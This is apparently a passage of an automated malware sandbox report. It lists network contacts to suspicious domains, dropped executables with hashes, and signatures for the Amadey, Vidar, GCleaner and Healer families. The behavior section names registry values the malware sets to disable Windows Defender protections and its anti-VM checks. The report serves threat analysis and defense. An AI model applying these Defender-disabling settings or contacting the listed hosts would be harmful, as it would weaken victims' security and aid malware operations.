| US | 104.21.94.161:443 | advertised.life | tcp |
| US | 104.21.48.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.48.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.48.1:443 | uncertainyelemz.bet | tcp |
| US | 8.8.8.8:53 | breakfasutwy.cyou | udp |
| US | 8.8.8.8:53 | importenptoc.com | udp |
| US | 8.8.8.8:53 | voicesharped.com | udp |
| US | 8.8.8.8:53 | inputrreparnt.com | udp |
| US | 8.8.8.8:53 | torpdidebar.com | udp |
| US | 104.21.42.12:443 | pirtyoffensiz.bet | tcp |
| US | 104.21.48.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.48.1:443 | uncertainyelemz.bet | tcp |
| US | 8.8.8.8:53 | rebeldettern.com | udp |
| US | 8.8.8.8:53 | actiothreaz.com | udp |
| DE | 93.186.202.3:4000 | towerbingobongoboom.com | tcp |
| US | 104.21.48.1:443 | uncertainyelemz.bet | tcp |
| US | 8.8.8.8:53 | garulouscuto.com | udp |
| US | 8.8.8.8:53 | breedertremnd.com | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | outlinedtrai.bet | udp |
| US | 104.21.38.27:443 | outlinedtrai.bet | tcp |
| US | 8.8.8.8:53 | investiigato.website | udp |
| US | 104.21.48.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.48.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.48.1:443 | uncertainyelemz.bet | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 104.21.48.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.48.1:443 | uncertainyelemz.bet | tcp |
Files
memory/2520-0-0x0000000000E00000-0x00000000012C9000-memory.dmp
memory/2520-1-0x0000000077A90000-0x0000000077A92000-memory.dmp
memory/2520-2-0x0000000000E01000-0x0000000000E69000-memory.dmp
memory/2520-3-0x0000000000E00000-0x00000000012C9000-memory.dmp
memory/2520-5-0x0000000000E00000-0x00000000012C9000-memory.dmp
memory/2520-16-0x0000000006940000-0x0000000006E09000-memory.dmp
memory/2520-21-0x0000000000E01000-0x0000000000E69000-memory.dmp
\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
| MD5 | 78ec3bb0db3cee811be50f99dd89e2fe |
| SHA1 | 1ec0122be4458914a8b07c7b0bf34faf47d14c19 |
| SHA256 | f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5 |
| SHA512 | d36b32948ad76a558bbb3dbcbbdfeb911f581ab59b4a7502c09e5b4479b0fe9976cd473870f7dd7717da5c2639817c9990388d39f42e712410533b04893da082 |
memory/2520-20-0x0000000000E00000-0x00000000012C9000-memory.dmp
memory/2716-22-0x0000000000C50000-0x0000000001119000-memory.dmp
memory/2520-18-0x0000000006940000-0x0000000006E09000-memory.dmp
memory/2716-23-0x0000000000C50000-0x0000000001119000-memory.dmp
memory/2716-24-0x0000000000C50000-0x0000000001119000-memory.dmp
memory/2716-27-0x0000000000C50000-0x0000000001119000-memory.dmp
memory/2716-26-0x0000000000C50000-0x0000000001119000-memory.dmp
memory/2716-28-0x0000000000C50000-0x0000000001119000-memory.dmp
memory/2716-29-0x0000000000C50000-0x0000000001119000-memory.dmp
memory/2716-30-0x0000000000C50000-0x0000000001119000-memory.dmp
memory/2716-31-0x0000000000C50000-0x0000000001119000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe
| MD5 | 515748a93ce7beb3f4416ec66ba8488e |
| SHA1 | 3ba2f1a56dcc91967361622c56b1ba545cda4325 |
| SHA256 | a09d49280077ed84d72c5b39977a67155f7bf1bc12615fecb6ec81a0aa2f92a6 |
| SHA512 | 3ce752a103a11b4ef84e6531f4feebcd70f5dfde979e3952709a686fb03e67741d894037406fc23fc5ea3b506d650653a01f3ef48fd7b5a44f79e45c8eb96ffb |
C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
| MD5 | 896dc9ae02a4b0cf429b4346a3990fae |
| SHA1 | 17f297bb4cf3acd07078fc5d73c1d6564a8c0710 |
| SHA256 | 6498189cc01fc00d92663abc7f60c27326ba5f059f1b2c4f499ed2856722d8a2 |
| SHA512 | e642b273a2cc01a32cede4d3400a910825d89d117333e0a96488721636783b9065f081ace394af0c484be4e60ab5249b390e840aeaa4115920e976fbd632851c |
memory/2940-61-0x000000013FF20000-0x00000001403DB000-memory.dmp
memory/1740-62-0x00000000011E0000-0x0000000001290000-memory.dmp
memory/2820-78-0x0000000000400000-0x000000000045F000-memory.dmp
memory/2820-73-0x0000000000400000-0x000000000045F000-memory.dmp
memory/2820-71-0x0000000000400000-0x000000000045F000-memory.dmp
memory/2820-69-0x0000000000400000-0x000000000045F000-memory.dmp
memory/2820-67-0x0000000000400000-0x000000000045F000-memory.dmp
memory/2820-65-0x0000000000400000-0x000000000045F000-memory.dmp
memory/2820-76-0x0000000000400000-0x000000000045F000-memory.dmp
memory/2820-75-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
memory/2716-82-0x0000000000C50000-0x0000000001119000-memory.dmp
memory/2716-83-0x0000000000C50000-0x0000000001119000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
| MD5 | 87da0483aefde76a5086c5b2ea14304f |
| SHA1 | ae6b27aeaf487666c71b26397709004e65b09002 |
| SHA256 | 33f44b2fa9a46ef2ce1d03303d8f959e070ba8a1109ad302b5461ad74ef99c4f |
| SHA512 | ca28949636f5d32e161b81d993a22839d65aea050ba7f8452ca70b6a2c8fd7385adbb9f2e5ad7da8edd3956b9d222452d5b86684ff0c7f3e2dc86930820f65e4 |
memory/2996-98-0x0000000000400000-0x000000000086A000-memory.dmp
memory/2716-97-0x0000000006AB0000-0x0000000006F1A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab36BC.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\Tar36CE.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 85161b67da1a3df1f9d35b48d05dfcd1 |
| SHA1 | c61740cf82fa55a77f3d2fe8f0fc7cb1fa9d0ddf |
| SHA256 | d97f42f4b1dbdaf9afdded0834b6aa07d795f4f38827c07faa5503f1873059b7 |
| SHA512 | 78b7f5e8f462b2e49de2338c0f29238a99c785286f230dc8176b89d2f78916b2a42aa497c0d42a0d047ea404e6bff0ba50ee8dabb8fb9ffc38bfc64ae7e21f4f |
C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe
| MD5 | 5b0bf9144e2661027c1621957b1ef278 |
| SHA1 | 589efc0736ecc18d94e4dd8d353502e8d76738c4 |
| SHA256 | a4337bb42c32b5dd68fef60740164ec01ee3f94ecc8345f4d396eea82f96b21f |
| SHA512 | e0b10ecfbd4e241a78653a05ed1b65f89fe4c25109fd1276d0091d834ee9e90d3f4c253b506ab508cfd81ba65214a0917d6fe902873ccc1f179fae57b6db2177 |
C:\Users\Admin\AppData\Local\Temp\hETCfbLxc.hta
| MD5 | 6a3a2756387d1c8e5ec150c2f910e488 |
| SHA1 | be8a023493cfce056e8cfd884498984c26be48bd |
| SHA256 | 60b7dc972da88caf9e242c773088e1df29aa3d9fa2f52049c2cf1441aad6363a |
| SHA512 | 9778be38d5e30700fc56cf6092972fe8a19b024ab81078924055c1cbf662acc7f003cb2253788ec67f022ff33d0fd66aead8c75f8125e5f830cc989fae470659 |
C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd
| MD5 | 189e4eefd73896e80f64b8ef8f73fef0 |
| SHA1 | efab18a8e2a33593049775958b05b95b0bb7d8e4 |
| SHA256 | 598651a10ff90d816292fba6e1a55cf9fb7bb717f3569b45f22a760849d24396 |
| SHA512 | be0e6542d8d26284d738a33df3d574d9849d709d091d66588685a1ac30ed1ebef48a9cc9d8281d9aeebc70fed0ddae22750cd253ec6b89e78933de08b0a09b74 |
\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE
| MD5 | 03a574d64f0e62c5e117a5f5acf137e4 |
| SHA1 | 93ba2b5bdac91342c9eeaeaf3e44cc1793ee6d90 |
| SHA256 | dcc540b3c86a167bb0cf71e8d4598f7566fe0f625d64ffe7a37f0d5f502be747 |
| SHA512 | d1b76d82c522ccb157dcd5155011619b36baf3516cf08cb6bc98fb9bc009230e5c53d77f5d8adc0e85dde678b4b3542823919ee6490533df8250078caca1b9b1 |
memory/1756-260-0x0000000006440000-0x0000000006892000-memory.dmp
memory/2944-259-0x0000000000900000-0x0000000000D52000-memory.dmp
memory/1756-258-0x0000000006440000-0x0000000006892000-memory.dmp
memory/2716-257-0x0000000006AB0000-0x0000000006F1A000-memory.dmp
memory/2944-280-0x0000000000900000-0x0000000000D52000-memory.dmp
memory/2944-279-0x0000000000900000-0x0000000000D52000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\30SMFKX3Q831TJGZG868.temp
| MD5 | 54200432a451e4fa263abc6274ceeb41 |
| SHA1 | f65f6532098388e91c209baec0ceccf9e6d36808 |
| SHA256 | 18ab5c4567b7f0a1b0e658a30139ccdc2cbc7d2b2376cc4837b435d0520de293 |
| SHA512 | addc696c78ee97b088ebcbaaf2ebfbb7994198856959b175de25f042d1de89f7e01b431a9e80f1cc878272292c78f114e5c6dd56401b0647915cb005ffd2c661 |
memory/2996-307-0x0000000000400000-0x000000000086A000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Temp\hWO8LyeS1.hta
| MD5 | 16d76e35baeb05bc069a12dce9da83f9 |
| SHA1 | f419fd74265369666595c7ce7823ef75b40b2768 |
| SHA256 | 456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7 |
| SHA512 | 4063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e |
memory/2716-324-0x0000000000C50000-0x0000000001119000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000007.dbtmp
| MD5 | 18e723571b00fb1694a3bad6c78e4054 |
| SHA1 | afcc0ef32d46fe59e0483f9a3c891d3034d12f32 |
| SHA256 | 8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa |
| SHA512 | 43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2 |
memory/2996-361-0x0000000000400000-0x000000000086A000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000006.dbtmp
| MD5 | aefd77f47fb84fae5ea194496b44c67a |
| SHA1 | dcfbb6a5b8d05662c4858664f81693bb7f803b82 |
| SHA256 | 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611 |
| SHA512 | b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3 |
C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe
| MD5 | 41e7a544f14c8eeda7675b6f8fc2f267 |
| SHA1 | 98585d0462f44ace4216e00c0ae33f7b3606e0d4 |
| SHA256 | b5d4798fed8196e12260f2152245af80763fe877d807069d7f0ca08fd4ee6843 |
| SHA512 | 6457c3a40dc56b82cf6eabb95d4591eab45aca0fff0bfeb03e20cc25a250b411cef072833bca7c1f58590bad4b10327bb364c1163896f0b2aaab6fde57a8e9ef |
memory/2716-428-0x0000000006AB0000-0x0000000006DDE000-memory.dmp
memory/1644-429-0x0000000000920000-0x0000000000C4E000-memory.dmp
memory/2716-427-0x0000000006AB0000-0x0000000006DDE000-memory.dmp
\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
| MD5 | d433e1dc943e6ea29d67cf72d2f6fecd |
| SHA1 | 9964aa3e596d93673c4d84695dc94d6f1a9766cd |
| SHA256 | a4c8487df15d27bad7699778b81dd6569c0b0e759bd0017f399b39cfa53bd1c5 |
| SHA512 | caab39684638d71e901b2915313c618baba27c015b0fc52c7503eb714dd4f9068bfadd30cd2d3e240ec925b003e9535e12ffdd5db3a610fcd056032ea925ca43 |
memory/628-467-0x0000000000FF0000-0x000000000131E000-memory.dmp
memory/1644-465-0x0000000000920000-0x0000000000C4E000-memory.dmp
memory/2056-478-0x00000000010C0000-0x00000000013E0000-memory.dmp
memory/2780-451-0x0000000006570000-0x0000000006890000-memory.dmp
memory/2056-450-0x00000000010C0000-0x00000000013E0000-memory.dmp
memory/2780-449-0x0000000006570000-0x0000000006890000-memory.dmp
memory/2944-502-0x0000000000900000-0x0000000000D52000-memory.dmp
memory/2716-545-0x0000000000C50000-0x0000000001119000-memory.dmp
memory/2996-567-0x0000000000400000-0x000000000086A000-memory.dmp
memory/2716-589-0x0000000006AB0000-0x0000000006DDE000-memory.dmp
memory/2716-588-0x0000000006AB0000-0x0000000006DDE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe
| MD5 | 49a690607e1d76e6970b724c4fd22ec7 |
| SHA1 | 4b670fc77c181e9afb3986729ee3b585bc460c3f |
| SHA256 | 0d7d5c2d601ffd78f5714d6149aef687e5edefcaf88bb9d2d529e69233220ef7 |
| SHA512 | 54ae94f0bddeeef34e9c5cb1f9bebde49085807e0bb71015bac171ec9b73649ee85a799194ad9861da8221948e0e0e12d74346ad602d47e3d7781100f75d5f5b |
memory/2912-625-0x0000000000A10000-0x0000000000D0F000-memory.dmp
memory/2716-626-0x0000000006AB0000-0x0000000006DAF000-memory.dmp
memory/2716-624-0x0000000006AB0000-0x0000000006DAF000-memory.dmp
memory/2912-651-0x0000000000A10000-0x0000000000D0F000-memory.dmp
memory/628-650-0x0000000000FF0000-0x000000000131E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1091742001\022606d6b2.exe
| MD5 | 1b7c22a214949975556626d7217e9a39 |
| SHA1 | d01c97e2944166ed23e47e4a62ff471ab8fa031f |
| SHA256 | 340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87 |
| SHA512 | ba64847cf1d4157d50abe4f4a1e5c1996fe387c5808e2f758c7fb3213bfefe1f3712d343f0c30a16819749840954654a70611d2250fd0f7b032429db7afd2cc5 |
C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe
| MD5 | 03b33bee015493080376b643025fdf86 |
| SHA1 | bdadfa2adfc6d9c5413bcb2ac1d3b1918fb95bfd |
| SHA256 | 4acb822963132fd6bce9c8a61b8aa3d5015aadfd268717c1bf1c84ed3a8c809b |
| SHA512 | 6e758f621d5fd1d041e926b6bd607e670329def72e8b9ffb940e28a7ed77212f8e6a6eabf7d15e912ae842a990ebf6fc65779f64307fb86993fcd97790eeccf9 |
memory/628-702-0x0000000000FF0000-0x000000000131E000-memory.dmp
\Users\Admin\AppData\Local\Temp\10000370101\inet.exe
| MD5 | 9d6f03d5a83f9ab0de52c69257720122 |
| SHA1 | 407ce825de553f856059543cb20c2002f4b2b87d |
| SHA256 | ab2c3bb1cf80ccd63b4e1be5b2aef4564542465e90f14e5110775658c6b7b9c6 |
| SHA512 | d937cb2599dd9a245e186a3f3d0efb786f9fbf5084c14878448f7454f175dc076d9af526a0f5ae24f75370247c70ae6e4f310d6d610f6ed4fdb2877b9c9468db |
memory/628-714-0x0000000006B50000-0x0000000006FB0000-memory.dmp
memory/1804-713-0x0000000000400000-0x0000000000860000-memory.dmp
memory/628-712-0x0000000006B50000-0x0000000006FB0000-memory.dmp
memory/2716-719-0x0000000006AB0000-0x0000000006DAF000-memory.dmp
memory/2716-718-0x0000000000C50000-0x0000000001119000-memory.dmp
memory/2996-720-0x0000000000400000-0x000000000086A000-memory.dmp
memory/628-721-0x0000000006B50000-0x0000000006FB0000-memory.dmp
memory/1804-723-0x0000000000400000-0x0000000000860000-memory.dmp
memory/628-722-0x0000000000FF0000-0x000000000131E000-memory.dmp
memory/1804-724-0x0000000000400000-0x0000000000860000-memory.dmp
memory/2716-743-0x0000000000C50000-0x0000000001119000-memory.dmp
memory/2996-744-0x0000000000400000-0x000000000086A000-memory.dmp
memory/2996-784-0x0000000000400000-0x000000000086A000-memory.dmp
memory/628-785-0x0000000000FF0000-0x000000000131E000-memory.dmp
memory/1804-786-0x0000000000400000-0x0000000000860000-memory.dmp
memory/2708-790-0x0000000000400000-0x0000000000860000-memory.dmp
memory/2716-789-0x0000000000C50000-0x0000000001119000-memory.dmp
C:\Windows\Tasks\Test Task17.job
| MD5 | 5c7477b9c5f004c96d905ca251c16b58 |
| SHA1 | a1d57d7f2e0dcc6140d6d7a79ad0da59c544c11e |
| SHA256 | 85739875bdfaddd24be15a1046457e17cac757441804c627214973e8456a4b8e |
| SHA512 | fa91684c3360c99a24875f2e29f566fea2b2743f749a4c6e4ca6942b967b7dd37013646359f4083affc004b3db915756b7a166f22628397eeb4fec98e8ee2753 |
memory/628-792-0x0000000000FF0000-0x000000000131E000-memory.dmp
memory/1804-793-0x0000000000400000-0x0000000000860000-memory.dmp
memory/2708-796-0x0000000000400000-0x0000000000860000-memory.dmp
memory/2708-795-0x0000000000400000-0x0000000000860000-memory.dmp
memory/2716-794-0x0000000000C50000-0x0000000001119000-memory.dmp
memory/628-797-0x0000000000FF0000-0x000000000131E000-memory.dmp
memory/1804-798-0x0000000000400000-0x0000000000860000-memory.dmp
memory/2716-799-0x0000000000C50000-0x0000000001119000-memory.dmp
memory/2708-800-0x0000000000400000-0x0000000000860000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1091744001\728eb8fad7.exe
| MD5 | cf6bd1302ab35c1275fedadbabde12fa |
| SHA1 | 0b8f58dd6cc533ae2ac26abf9eac849962cbfeb1 |
| SHA256 | 14738b35a925299846ccbaaae1e5002ad3eb4b63af8d08f517a8f916c99902e7 |
| SHA512 | c29182f551fe1538eddbb3b1f946073db2feabcfbe23729fbf8d6f72d3079a38f746af9cfa4f6db68d31bed038105a76a3dd381ce70cde5d181ebada16cc1b04 |
memory/628-815-0x0000000000FF0000-0x000000000131E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1091745001\fefef60740.exe
| MD5 | 639af76cb7333cbd609da5d52a6e195b |
| SHA1 | a1c8a3e99f11c72f0dcdfd75b75d6dbe9f266483 |
| SHA256 | a6e9b84cd1cdf3312a57f425bce1a490195864c5fae5ba5b0873c729ebbe11a8 |
| SHA512 | 67510ef5a9dfa0d1dbf38d87a8f7b92b1dcd9e3979fc4632a19830875c5a86fa7261f8d11e86b506ebf7621352dc69093fb1a0e3432aa25118a1d6240c66de51 |
memory/1804-829-0x0000000000400000-0x0000000000860000-memory.dmp
memory/2716-830-0x0000000000C50000-0x0000000001119000-memory.dmp
memory/2708-831-0x0000000000400000-0x0000000000860000-memory.dmp
memory/2880-832-0x00000000009C0000-0x0000000001604000-memory.dmp
memory/2264-833-0x0000000000400000-0x000000000042F000-memory.dmp
memory/2264-835-0x0000000000400000-0x000000000042F000-memory.dmp
memory/2880-834-0x00000000009C0000-0x0000000001604000-memory.dmp
memory/2264-839-0x0000000010000000-0x000000001001C000-memory.dmp
memory/628-844-0x0000000000FF0000-0x000000000131E000-memory.dmp
memory/2652-845-0x0000000000E10000-0x0000000001848000-memory.dmp
memory/1548-848-0x0000000000400000-0x000000000042F000-memory.dmp
memory/2652-847-0x0000000000E10000-0x0000000001848000-memory.dmp
memory/1804-850-0x0000000000400000-0x0000000000860000-memory.dmp
memory/1804-851-0x0000000000400000-0x0000000000860000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1LNUKNV0\success[2].htm
| MD5 | cfcd208495d565ef66e7dff9f98764da |
| SHA1 | b6589fc6ab0dc82cf12099d1c2d40ab994e8410c |
| SHA256 | 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9 |
| SHA512 | 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99 |
memory/2716-853-0x0000000000C50000-0x0000000001119000-memory.dmp
memory/2708-854-0x0000000000400000-0x0000000000860000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1091747001\ff28c3aaec.exe
| MD5 | db3632ef37d9e27dfa2fd76f320540ca |
| SHA1 | f894b26a6910e1eb53b1891c651754a2b28ddd86 |
| SHA256 | 0513f12c182a105759497d8280f1c06800a8ff07e1d69341268f3c08ecc27c6d |
| SHA512 | 4490b25598707577f0b1ba1f0fbe52556f752b591c433117d0f94ce386e86e101527b3d1f9982d6e097e1fcb724325fdd1837cc51d94c6b5704fd8df244648fd |
C:\Users\Admin\AppData\Local\Temp\1091749001\2f4444c5a8.exe
| MD5 | f071beebff0bcff843395dc61a8d53c8 |
| SHA1 | 82444a2bba58b07cb8e74a28b4b0f715500749b2 |
| SHA256 | 0d89d83e0840155d3a4ceca1d514e92d9af14074be53abc541f80b6af3b0ceec |
| SHA512 | 1ac92897a11dbd3bd13b76bfeb2c8941fdffa7f33bc9e4db7781061fb684bfe8b8d19c21a22b3b551987f871c047b7518091b31fc743757d8f235c88628d121d |
memory/2468-915-0x0000000001320000-0x00000000013D0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe
| MD5 | 69de9fb1f2c4da9f83d1e076bc539e4f |
| SHA1 | 22ce94c12e53a16766adf3d5be90a62790009896 |
| SHA256 | 0df459c85df5ee90a32edcecd4c0519c00fcf9315b9a24edc132d8cf0f6c7ef8 |
| SHA512 | e9f2da39ecbb583943ae618097469e5d82953712b6cfdfa4b58fa4dcc2f683a7049aca4141b897ff1f6ab94d7bbaf21c7dec2e243c8632d46a55e15c363a9733 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K3VL8XEP\soft[1]
| MD5 | f49d1aaae28b92052e997480c504aa3b |
| SHA1 | a422f6403847405cee6068f3394bb151d8591fb5 |
| SHA256 | 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0 |
| SHA512 | 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773 |
Analysis: behavioral2
Detonation Overview
Submitted
2025-02-24 13:38
Reported
2025-02-24 13:41
Platform
win10v2004-20250217-en
Max time kernel
150s
Max time network
149s
Command Line
Signatures
Amadey
Amadey family
Detect Vidar Stealer
Detects Healer an antivirus disabler dropper
GCleaner
Gcleaner family
Healer
Healer family
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE | N/A |
Modifies Windows Defender TamperProtection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE | N/A |
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications | C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE | N/A |
Vidar
Vidar family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091745001\31a8d2ea41.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091744001\b205fd23e0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe | N/A |
